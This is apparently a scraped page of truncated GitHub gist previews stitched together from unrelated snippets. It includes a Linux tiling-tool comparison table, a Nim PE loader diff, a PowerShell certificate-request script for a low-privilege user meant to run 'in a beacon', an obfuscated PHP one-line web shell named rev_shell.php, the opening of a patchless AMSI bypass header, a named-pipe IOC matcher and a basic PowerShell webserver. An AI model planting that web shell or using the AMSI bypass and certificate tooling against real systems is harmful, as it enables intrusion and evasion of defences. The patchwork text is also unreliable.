| diff --git a/Main.nim b/Main.nim | |
| index ef19f4c..c133586 100644 | |
| --- a/Main.nim | |
| +++ b/Main.nim | |
| @@ -128,7 +128,7 @@ proc ApplyGeneralRelocations(patchAddress:uint64,sectionStartAddress:uint64,give | |
| echo "[!] No code for type: ",givenType | |
| var allocatedMemory:LPVOID = nil | |
| - | |
| +var caveLibH: HANDLE |
| import winim | |
| import std/strutils, os | |
| proc lpwstrc(bytes: array[MAX_PATH, WCHAR]): string = | |
| result = newString(bytes.len) | |
| for i in bytes: | |
| result &= cast[char](i) | |
| result = strip(result, chars = {cast[char](0)}) | |
| var pages = newSeq[int](0) |
Goal: find a Linux alternative to FancyZones for Windows
| Name | Recommended | Type | Supports main colum | Supports layouts | Multiple windows in same tile | Windows can span multiple zones | Notes |
|---|---|---|---|---|---|---|---|
| Tiling Shell | Gnome extension | yes | yes | yes | yes | Explicitly inspired by Windows tiling | |
| gSnap | 👍👍 | Gnome extension | yes | yes | yes | yes | Can be configured almost just like FancyZones; in the settings:
|
| gTile | Gnome extension | no? | |||||
| Tiling Assistant | 👍 | Gnome extension | yes | yes | yes | yes | Layout support is "experimental" and the UX i |
| #Thank you @NotMedic for troubleshooting/validating stuff! | |
| $password = Read-Host -Prompt "Enter Password" | |
| #^^ Feel free to hardcode this for running in a beacon/not retyping it all the time! | |
| $server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now. | |
| $CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored? | |
| $CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box. | |
| $CASERVER = "alexlab-dc01-ca" #CA name. | |
| $CA = $CAFQDN + "\" + $CASERVER |
| <?=`{${~"\xa0\xb8\xba\xab"}["\xa0"]}`; | |
| /* | |
| * In terminal: | |
| * $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php | |
| * This is how the code will be produced, \xa0\xb8\xba\xab will be | |
| * treated as constant therefore no " needed. It is also not copyable | |
| * string because of non-ascii characters | |
| * | |
| * Explanation: |
| <Project Sdk="Microsoft.NET.Sdk"> | |
| <PropertyGroup> | |
| <OutputType>Exe</OutputType> | |
| <TargetFramework>net40</TargetFramework> | |
| </PropertyGroup> | |
| <ItemGroup> | |
| <PackageReference Include="Microsoft.NETFramework.ReferenceAssemblies.net40" Version="1.0.2"> | |
| <PrivateAssets>all</PrivateAssets> | |
| <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets> | |
| </PackageReference> |
| #ifndef PATCHLESS_AMSI_H | |
| #define PATCHLESS_AMSI_H | |
| #include <windows.h> | |
| static const int AMSI_RESULT_CLEAN = 0; | |
| PVOID g_amsiScanBufferPtr = nullptr; | |
| unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |
| import re, sys | |
| def rule_startswith(ioc_string): | |
| def __match(pipename): | |
| if pipename.startswith(ioc_string): | |
| print("\tMATCH startswith({})".format(ioc_string)) | |
| return True | |
| return False | |
| return __match |
| filter Send-AmsiContent { | |
| <# | |
| .SYNOPSIS | |
| Supplies the AmsiScanBuffer function with a buffer to be scanned by an AMSI provider. | |
| Author: Matt Graeber | |
| Company: Red Canary | |
| .DESCRIPTION |
| # This is a super **SIMPLE** example of how to create a very basic powershell webserver | |
| # 2019-05-18 UPDATE — Created by me and and evalued by @jakobii and the comunity. | |
| # Http Server | |
| $http = [System.Net.HttpListener]::new() | |
| # Hostname and port to listen on | |
| $http.Prefixes.Add("http://localhost:8080/") | |
| # Start the Http Server |